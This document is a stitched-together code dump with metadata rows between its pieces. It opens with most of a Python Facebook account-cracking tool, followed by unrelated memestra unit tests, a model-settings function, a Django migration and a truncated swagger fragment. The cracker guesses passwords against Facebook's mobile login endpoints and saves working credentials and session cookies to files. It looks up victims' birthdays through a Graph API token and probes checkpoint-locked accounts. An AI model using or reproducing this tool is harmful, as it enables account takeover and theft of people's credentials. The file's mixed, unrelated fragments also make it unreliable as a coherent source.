p = ses.get("https://m.facebook.com/login/?next&ref=dbl&fl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack Kalo Hoki Dapat Ok ###
def freefb(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://free.facebook.com/login/?next&ref=dbl&fl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Check Crack ###
def hasil():
if len(ok) != 0 or len(cp) != 0:
exit(orbxd.awokawokaowkwoawkwowksheheheiwoansvdejeike_dekura_sayang())
else:
exit("\n\033[0;96m\033[0;97m [\033[;36m•\033[1;37m] Lah? Kok Gak Dapat Hasil :v\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Makanya Gans Biar Dapat Result :v")
### Pilih Result ###
def ress():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] RESULT CRACKER")
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Cek Result Crack Friends,Public,Likes,Followers")
print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Cek Result Crack Email")
print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Cek Result Crack Phone Number")
print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Back To Menu")
pill = raw_input('\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ')
if pill =="1" or pill =="01":
result_mbasicc()
elif pill =="2" or pill =="02":
result_emailampas()
elif pill =="3" or pill =="03":
result_nomoertogel()
elif pill =="0" or pill =="00":
menu()
else:
print('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!').format(R, N)
ress()
### Result __All__ ###
def result_mbasicc():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result M Facebook ###
def result_emefbi():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker M.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat mfb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat mfb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Touch Facebook ###
def result_touchh():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Touch.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat touchfb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat touchfb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Api Facebook ###
def result_apei():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Api.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat apifb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat apifb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Milih Tok Kok ###
def awokawokaowkwoawkwowksheheheiwoansvdejeike_dekura_sayang():
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Option Account Sesi? y/n")
kotntodhsvsvsvsvsv = raw_input('\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ')
if kotntodhsvsvsvsvsv == "y" or kotntodhsvsvsvsvsv == "Y":
option_sesi()
elif kotntodhsvsvsvsvsv == "n" or kotntodhsvsvsvsvsv == "N":
os.remove('checkcp.txt')
menu()
else:
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Pilihan Cuma y/n Gak Ada Yang Laen Tololl!")
# Check Option Crack Langsung ###
def option_sesi():
files = ("checkcp.txt")
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Files %s%s%s Tidak Ada!"%(h,files,p))
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Account : "+(kontol.replace(" + ","")))
try:
dekura_chann(titid[0].replace(" + ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
os.remove('checkcp.txt')
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Done Ya Anjing")
def dekura_chann(user, pasw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
ses = requests.Session()
# kntl bapackkau pecah
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
num = 0
for _ in xe:
num += 1
print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Opsi Yang Tersedia "+str(len(ngew)))
for opt in range(len(ngew)):
print(" [\033[1;36m"+str(opt+1)+"\033[1;37m] "+ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] %s"%(oh))
else:
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Eror Login Failed!\n")
### Result Free Facebook ###
def result_freeefbi():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Free.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat freefb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat freefb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Email ###
def result_emailampas():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Email\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Email "))
try:
os.system("cat email/hasil.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Nomor ###
def result_nomoertogel():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Phone Number\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Live/Check "))
try:
os.system("cat done/indo.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Update Kontol ###
def up():
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m•\x1b[1;37m] Mohon Bersabar User, Script Sedang Di Update!'
os.sys.exit()
if __name__=="__main__":
os.system('git pull')
os.system('rm -rf checkcp.txt')
menu()
| 71.555118
| 43,318
| 0.669317
| 19,102
| 109,050
| 3.76971
| 0.052193
| 0.013637
| 0.04312
| 0.088392
| 0.87153
| 0.859629
| 0.847158
| 0.838728
| 0.832618
| 0.826647
| 0
| 0.181568
| 0.120202
| 109,050
| 1,523
| 43,319
| 71.602101
| 0.567583
| 0.014415
| 0
| 0.666164
| 0
| 0.462698
| 0.685348
| 0.263913
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.046722
| 0.012811
| null | null | 0.180859
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
981558cf149b1c375e113c9babfee39ebbaf52dc
| 5,688
|
py
|
Python
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 21
|
2020-03-10T13:10:17.000Z
|
2021-06-14T17:54:01.000Z
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 48
|
2020-03-28T21:35:40.000Z
|
2022-02-14T15:14:47.000Z
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 9
|
2020-03-18T12:57:19.000Z
|
2021-11-21T09:40:25.000Z
|
from unittest import TestCase
from textwrap import dedent
from io import StringIO
import memestra
class TestBasic(TestCase):
def checkDeprecatedUses(self, code, expected_output, decorator=('decoratortest', 'deprecated')):
sio = StringIO(dedent(code))
output = memestra.memestra(sio, decorator, None)
self.assertEqual(output, expected_output)
def test_import(self):
code = '''
import decoratortest
@decoratortest.deprecated
def foo(): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_alias(self):
code = '''
import decoratortest as dec
@dec.deprecated
def foo(): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_from(self):
code = '''
from decoratortest import deprecated
@deprecated
def foo(): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_from_alias(self):
code = '''
from decoratortest import deprecated as dp
@dp
def foo(): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_call_from_deprecated(self):
code = '''
from decoratortest import deprecated as dp
@dp
def foo(): pass
@dp
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])
def test_import_from_same_module_and_decorator(self):
code = '''
from deprecated import deprecated
@deprecated
def foo(): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)],
('deprecated', 'deprecated'))
class TestClassBasic(TestCase):
def checkDeprecatedUses(self, code, expected_output):
sio = StringIO(dedent(code))
output = memestra.memestra(sio, ('decoratortest', 'deprecated'), None)
self.assertEqual(output, expected_output)
def test_import(self):
code = '''
import decoratortest
@decoratortest.deprecated
class foo: pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_alias(self):
code = '''
import decoratortest as dec
@dec.deprecated
class foo: pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_from(self):
code = '''
from decoratortest import deprecated
@deprecated
class foo: pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_import_from_alias(self):
code = '''
from decoratortest import deprecated as dp
@dp
class foo(object): pass
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])
def test_instance_from_deprecated(self):
code = '''
from decoratortest import deprecated as dp
@dp
class foo(object): pass
@dp
def bar():
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])
def test_use_in_inheritance(self):
code = '''
from decoratortest import deprecated as dp
@dp
class foo(object): pass
class bar(foo): pass
'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 7, 10, None)])
def test_instance_from_deprecated_class(self):
code = '''
from decoratortest import deprecated as dp
@dp
class foo(object): pass
@dp
class bar(object):
foo()
foo()'''
self.checkDeprecatedUses(
code,
[('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])
def test_decorator_with_param(self):
code = '''
from decoratortest import deprecated as dp
@dp()
class foo(object): pass
@dp("ignored")
def bar(x):
foo()
bar(foo)'''
self.checkDeprecatedUses(
code,
[('bar', '<>', 11, 0, 'ignored'),
('foo', '<>', 9, 4, None),
('foo', '<>', 11, 4, None)])
| 22.661355
| 100
| 0.445323
| 511
| 5,688
| 4.874755
| 0.101761
| 0.051385
| 0.151746
| 0.156564
| 0.832196
| 0.832196
| 0.806102
| 0.764352
| 0.727419
| 0.727419
| 0
| 0.021277
| 0.413326
| 5,688
| 250
| 101
| 22.752
| 0.725202
| 0
| 0
| 0.827586
| 0
| 0
| 0.462553
| 0.00879
| 0
| 0
| 0
| 0
| 0.011494
| 1
| 0.091954
| false
| 0.086207
| 0.155172
| 0
| 0.258621
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
981a79c8e63851a61c265a8b603f97eea31d45e4
| 1,853
|
py
|
Python
|
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
def Setup(Settings,DefaultModel):
# set1-test_of_models_against_datasets/osm299.py
Settings["experiment_name"] = "set1_Img_model_versus_datasets_299px"
Settings["graph_histories"] = ['together'] #['all','together',[],[1,0],[0,0,0],[]]
# 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
n=0
Settings["models"][n]["dataset_name"] = "5556x_reslen30_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'simple_cnn_with_top'
Settings["models"][n]["unique_id"] = 'img_minlen30_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_reslen20_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'simple_cnn_with_top'
Settings["models"][n]["unique_id"] = 'img_minlen20_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_mark_res_299x299"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'simple_cnn_with_top'
Settings["models"][n]["unique_id"] = 'img_nosplit_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
return Settings
| 44.119048
| 89
| 0.683756
| 237
| 1,853
| 5.025316
| 0.261603
| 0.293871
| 0.289673
| 0.092359
| 0.742233
| 0.742233
| 0.716205
| 0.716205
| 0.716205
| 0.716205
| 0
| 0.078915
| 0.124663
| 1,853
| 41
| 90
| 45.195122
| 0.655364
| 0.090664
| 0
| 0.65625
| 0
| 0
| 0.462225
| 0.100535
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c5430e5dd6e17d82b3e84bbf30491bf4d92ef91
| 2,195
|
py
|
Python
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 3
|
2020-05-10T08:40:36.000Z
|
2020-10-28T18:09:31.000Z
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 1
|
2019-12-17T23:41:17.000Z
|
2019-12-17T23:42:43.000Z
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 1
|
2021-06-11T10:49:10.000Z
|
2021-06-11T10:49:10.000Z
|
# Generated by Django 2.2.8 on 2019-12-12 17:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('basic', '0023_auto_20191212_1820'),
]
operations = [
migrations.AlterField(
model_name='favouritepart',
name='digikey_mnu',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='favouritepart',
name='digikey_usd',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='favouritepart',
name='farnell_czk',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='favouritepart',
name='farnell_mnu',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='favouritepart',
name='mouser_eur',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='favouritepart',
name='mouser_mnu',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='digikey_mnu',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='digikey_usd',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='farnell_czk',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='farnell_mnu',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='mouser_eur',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='historypart',
name='mouser_mnu',
field=models.CharField(max_length=50),
),
]
| 29.662162
| 50
| 0.553531
| 197
| 2,195
| 5.969543
| 0.208122
| 0.204082
| 0.255102
| 0.295918
| 0.87415
| 0.87415
| 0.87415
| 0.838435
| 0.838435
| 0.809524
| 0
| 0.037749
| 0.336219
| 2,195
| 73
| 51
| 30.068493
| 0.769389
| 0.020501
| 0
| 0.895522
| 1
| 0
| 0.139665
| 0.010708
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2c5670166e0cd0a581dc3141d07a58067267d893
| 73
|
py
|
Python
|
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
from .tts_test import TtsTest
from .tts_test_result import TtsTestResult
| 24.333333
| 42
| 0.863014
| 11
| 73
| 5.454545
| 0.636364
| 0.233333
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 43
| 36.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c834cc89b51505c372001825927e48cd5db8b8f
| 3,214
|
py
|
Python
|
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
from drf_yasg import openapi
company_params_in_header = openapi.Parameter(
